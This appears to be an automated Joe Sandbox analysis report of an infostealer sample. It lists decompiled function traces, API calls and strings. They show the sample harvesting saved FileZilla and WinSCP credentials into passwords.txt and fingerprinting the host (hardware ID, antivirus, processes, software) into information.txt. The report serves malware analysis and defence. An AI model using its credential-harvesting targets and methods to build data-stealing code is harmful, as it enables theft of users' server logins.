                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                  • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                  • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                  • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                  • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                  • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                  • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                • strtok_s.MSVCRT ref: 0040BCCB
                                                                                • GetProcessHeap.KERNEL32(00000000,000F423F,00425C9B,00425C9A,00425C97,00425C96), ref: 0040BD1F
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040BD26
                                                                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040BD3A
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040BD45
                                                                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040BD7D
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040BD88
                                                                                • StrStrA.SHLWAPI(00000000,<User>), ref: 0040BDC6
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040BDD1
                                                                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040BE0F
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040BE1E
                                                                                • lstrlenA.KERNEL32(?), ref: 0040C019
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                • memset.MSVCRT ref: 0040C06C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitmemsetstrtok_s
                                                                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                • API String ID: 486015307-935134978
                                                                                • Opcode ID: c68a0f27bc902ea05c839ad39b5d4922081ace22d6ea3294da39bef75c792f8c
                                                                                • Instruction ID: 255c4b719d3f0515adc493bcbacf9bf61407d1e7a5812a7bdcdf9b10872d254a
                                                                                • Opcode Fuzzy Hash: c68a0f27bc902ea05c839ad39b5d4922081ace22d6ea3294da39bef75c792f8c
                                                                                • Instruction Fuzzy Hash: DEE18F71900258EADB11EBE1DC56FEEBB78AF19304F50007AF505B21D2EF781A08CB69
                                                                                Function 0040E7B8 Relevance: 63.4, APIs: 22, Strings: 14, Instructions: 411registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040E7BD
                                                                                • memset.MSVCRT ref: 0040E7E6
                                                                                • memset.MSVCRT ref: 0040E806
                                                                                • memset.MSVCRT ref: 0040E81A
                                                                                • memset.MSVCRT ref: 0040E82E
                                                                                • memset.MSVCRT ref: 0040E83D
                                                                                • memset.MSVCRT ref: 0040E84B
                                                                                • memset.MSVCRT ref: 0040E85C
                                                                                • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040E884
                                                                                • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E8AC
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040E8F3
                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E910
                                                                                • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,00425C8F), ref: 0040E9A2
                                                                                • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0040E9F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$Value$Open$EnumH_prolog
                                                                                • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                • API String ID: 784052110-2798830873
                                                                                • Opcode ID: 86d90c555041147e3355f381ce4fc8bf561c3cd64d0a3905eecc7d65a5013481
                                                                                • Instruction ID: 89295896da61250e7cefd1c96a7d7708b6de7757bceb80d1fe37bfb71a37c9ed
                                                                                • Opcode Fuzzy Hash: 86d90c555041147e3355f381ce4fc8bf561c3cd64d0a3905eecc7d65a5013481
                                                                                • Instruction Fuzzy Hash: BCF11CB1D0015DAEDB11EBE1CC41FEEBB7CAF18304F5441BBE515B2182DA785A48CB65
                                                                                Function 00414604 Relevance: 51.8, APIs: 3, Strings: 26, Instructions: 1004stringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 877 414604-4153f5 _EH_prolog call 40f923 call 40fa9c call 40f9e1 call 40f98e call 4020ed call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fc38 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 410415 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4104a2 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4104dd call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e GetCurrentProcessId call 411001 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 41064b call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 41077c call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 410925 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fbfd call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fbcb call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4103a0 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fce5 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fc38 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fc92 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fe18 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40feb4 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fe81 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40ff81 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40ffea call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4102c3 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 410071 call 40fa28 call 40f9e1 call 40f98e * 2 call 410071 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fb4d lstrlenA call 40fb4d call 40f923 call 4010b1 call 414437 call 40f98e * 2 call 401061
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00414609
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FC38: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,0042654E), ref: 0040FC46
                                                                                  • Part of subcall function 0040FC38: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,0042654E), ref: 0040FC4D
                                                                                  • Part of subcall function 0040FC38: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,0042654E), ref: 0040FC59
                                                                                  • Part of subcall function 0040FC38: wsprintfA.USER32 ref: 0040FC84
                                                                                  • Part of subcall function 00410415: memset.MSVCRT ref: 0041043B
                                                                                  • Part of subcall function 00410415: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,NeB,?,?,00000000), ref: 00410457
                                                                                  • Part of subcall function 00410415: RegQueryValueExA.KERNEL32(NeB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 00410476
                                                                                  • Part of subcall function 00410415: CharToOemA.USER32(?,?), ref: 00410493
                                                                                  • Part of subcall function 004104A2: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 004104DD: _EH_prolog.MSVCRT ref: 004104E2
                                                                                  • Part of subcall function 004104DD: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                                  • Part of subcall function 004104DD: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                                  • Part of subcall function 004104DD: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                                  • Part of subcall function 004104DD: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00426600,00000000,?,00000000,00000000,?,HWID: ,00000000,?,004265F4,00000000), ref: 00414922
                                                                                  • Part of subcall function 00411001: OpenProcess.KERNEL32(00000410,00000000,2IA), ref: 00411019
                                                                                  • Part of subcall function 00411001: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411034
                                                                                  • Part of subcall function 00411001: CloseHandle.KERNEL32(00000000), ref: 0041103B
                                                                                  • Part of subcall function 0041064B: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory), ref: 0041065F
                                                                                  • Part of subcall function 0041064B: HeapAlloc.KERNEL32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory,00000000,?), ref: 00410666
                                                                                  • Part of subcall function 0041077C: _EH_prolog.MSVCRT ref: 00410781
                                                                                  • Part of subcall function 0041077C: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory,00000000), ref: 00410799
                                                                                  • Part of subcall function 0041077C: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 004107AA
                                                                                  • Part of subcall function 0041077C: CoCreateInstance.OLE32(00426FAC,00000000,00000001,00426EDC,?,?,00000000,?,?,?,?,?,?,00426624,00000000,?), ref: 004107C4
                                                                                  • Part of subcall function 0041077C: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004107FA
                                                                                  • Part of subcall function 0041077C: VariantInit.OLEAUT32(?), ref: 00410855
                                                                                  • Part of subcall function 00410925: _EH_prolog.MSVCRT ref: 0041092A
                                                                                  • Part of subcall function 00410925: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000,?,00000000), ref: 00410942
                                                                                  • Part of subcall function 00410925: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000), ref: 00410953
                                                                                  • Part of subcall function 00410925: CoCreateInstance.OLE32(00426FAC,00000000,00000001,00426EDC,?,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000,?), ref: 0041096D
                                                                                  • Part of subcall function 00410925: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?), ref: 004109A3
                                                                                  • Part of subcall function 00410925: VariantInit.OLEAUT32(?), ref: 004109F6
                                                                                  • Part of subcall function 0040FBFD: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,00414BBE,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000), ref: 0040FC09
                                                                                  • Part of subcall function 0040FBFD: HeapAlloc.KERNEL32(00000000,?,?,00414BBE,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ), ref: 0040FC10
                                                                                  • Part of subcall function 0040FBFD: GetComputerNameA.KERNEL32(00000000,00000000), ref: 0040FC24
                                                                                  • Part of subcall function 0040FBCB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,004265C7), ref: 0040FBD7
                                                                                  • Part of subcall function 0040FBCB: HeapAlloc.KERNEL32(00000000,?,?,?,00417274,004265C7), ref: 0040FBDE
                                                                                  • Part of subcall function 0040FBCB: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                                  • Part of subcall function 004103A0: CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 004103B5
                                                                                  • Part of subcall function 004103A0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004103C0
                                                                                  • Part of subcall function 004103A0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004103CB
                                                                                  • Part of subcall function 004103A0: ReleaseDC.USER32(00000000,00000000), ref: 004103D6
                                                                                  • Part of subcall function 004103A0: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426678,00000000,?), ref: 004103E2
                                                                                  • Part of subcall function 004103A0: HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426678,00000000,?,00000000), ref: 004103E9
                                                                                  • Part of subcall function 004103A0: wsprintfA.USER32 ref: 004103FB
                                                                                  • Part of subcall function 0040FCE5: _EH_prolog.MSVCRT ref: 0040FCEA
                                                                                  • Part of subcall function 0040FCE5: GetKeyboardLayoutList.USER32(00000000,00000000,004262AF,00000001,?,00000000), ref: 0040FD1C
                                                                                  • Part of subcall function 0040FCE5: LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD2A
                                                                                  • Part of subcall function 0040FCE5: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD35
                                                                                  • Part of subcall function 0040FCE5: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FD5F
                                                                                  • Part of subcall function 0040FCE5: LocalFree.KERNEL32(?), ref: 0040FE03
                                                                                  • Part of subcall function 0040FC92: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCA3
                                                                                  • Part of subcall function 0040FC92: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCAA
                                                                                  • Part of subcall function 0040FC92: GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCB9
                                                                                  • Part of subcall function 0040FC92: wsprintfA.USER32 ref: 0040FCD7
                                                                                  • Part of subcall function 0040FE18: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266D4), ref: 0040FE2C
                                                                                  • Part of subcall function 0040FE18: HeapAlloc.KERNEL32(00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266D4,00000000,?), ref: 0040FE33
                                                                                  • Part of subcall function 0040FE18: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE51
                                                                                  • Part of subcall function 0040FE18: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FE6D
                                                                                  • Part of subcall function 0040FEB4: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040FF07
                                                                                  • Part of subcall function 0040FEB4: wsprintfA.USER32 ref: 0040FF4D
                                                                                  • Part of subcall function 0040FE81: GetSystemInfo.KERNEL32(00000000), ref: 0040FE8E
                                                                                  • Part of subcall function 0040FE81: wsprintfA.USER32 ref: 0040FEA3
                                                                                  • Part of subcall function 0040FF81: GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C), ref: 0040FF8F
                                                                                  • Part of subcall function 0040FF81: HeapAlloc.KERNEL32(00000000), ref: 0040FF96
                                                                                  • Part of subcall function 0040FF81: GlobalMemoryStatusEx.KERNEL32 ref: 0040FFB6
                                                                                  • Part of subcall function 0040FF81: wsprintfA.USER32 ref: 0040FFDC
                                                                                  • Part of subcall function 0040FFEA: _EH_prolog.MSVCRT ref: 0040FFEF
                                                                                  • Part of subcall function 0040FFEA: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 00410057
                                                                                  • Part of subcall function 004102C3: _EH_prolog.MSVCRT ref: 004102C8
                                                                                  • Part of subcall function 004102C3: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410303
                                                                                  • Part of subcall function 004102C3: Process32First.KERNEL32(00000000,00000128), ref: 00410314
                                                                                  • Part of subcall function 004102C3: Process32Next.KERNEL32(?,00000128), ref: 0041037C
                                                                                  • Part of subcall function 004102C3: CloseHandle.KERNEL32(?,?,00000000), ref: 00410389
                                                                                  • Part of subcall function 00410071: _EH_prolog.MSVCRT ref: 00410076
                                                                                  • Part of subcall function 00410071: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,004262C7,00000001,00000000), ref: 004100BE
                                                                                  • Part of subcall function 00410071: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410108
                                                                                  • Part of subcall function 00410071: wsprintfA.USER32 ref: 00410132
                                                                                  • Part of subcall function 00410071: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041014F
                                                                                  • Part of subcall function 00410071: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410179
                                                                                  • Part of subcall function 00410071: lstrlenA.KERNEL32(?), ref: 0041018E
                                                                                  • Part of subcall function 00410071: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,004262F0), ref: 0041020E
                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,00426748,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,00426738), ref: 0041537A
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$H_prolog$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantlstrcat$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $T$Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                • API String ID: 722754166-3257470747
                                                                                • Opcode ID: 4b9fd54f7e51e5b3625fb3809e0446a4ef10545269b0a6af337ebca9e7ba9020
                                                                                • Instruction ID: 15cc8dd7e761a7b9687d1197911a175701b94bd7e601d052700fcacce4104c59
                                                                                • Opcode Fuzzy Hash: 4b9fd54f7e51e5b3625fb3809e0446a4ef10545269b0a6af337ebca9e7ba9020
                                                                                • Instruction Fuzzy Hash: 53922EB190424DE9CB15E7E1C952BEEBB789F24308F5001BEE505725C2DE782B8CCAB5
                                                                                Function 0040C27B Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 296stringmemoryfileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040C280
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
